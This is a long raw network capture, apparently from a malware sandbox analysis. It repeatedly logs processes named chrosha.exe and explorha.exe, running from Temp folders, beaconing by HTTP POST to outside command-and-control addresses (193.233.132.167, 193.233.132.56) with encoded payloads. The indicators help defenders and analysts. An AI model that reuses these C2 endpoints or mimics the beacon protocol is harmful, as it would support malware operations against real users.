                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:43.776519060 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      381192.168.2.550225193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:43.855433941 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:44.104487896 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      382192.168.2.550226193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:44.135159969 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:44.382802010 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      383192.168.2.550227193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:44.361315012 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:44.615130901 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      384192.168.2.550228193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:44.633128881 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:44.881129980 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      385192.168.2.550229193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:44.971719027 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:45.214735031 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      386192.168.2.550230193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:45.247432947 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:45.499214888 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      387192.168.2.550231193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:45.467149973 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:45.720366001 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      388192.168.2.550232193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:45.753509045 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.006728888 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      389192.168.2.550233193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.087783098 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.334772110 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      390192.168.2.550234193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.365380049 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.610142946 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      391192.168.2.550235193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.584413052 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.836993933 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      392192.168.2.550236193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.855776072 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.102091074 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      393192.168.2.550237193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.202605009 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.454123974 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      394192.168.2.550238193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.465522051 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.714258909 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      395192.168.2.550239193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.705157995 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.956870079 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      396192.168.2.550240193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.970500946 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
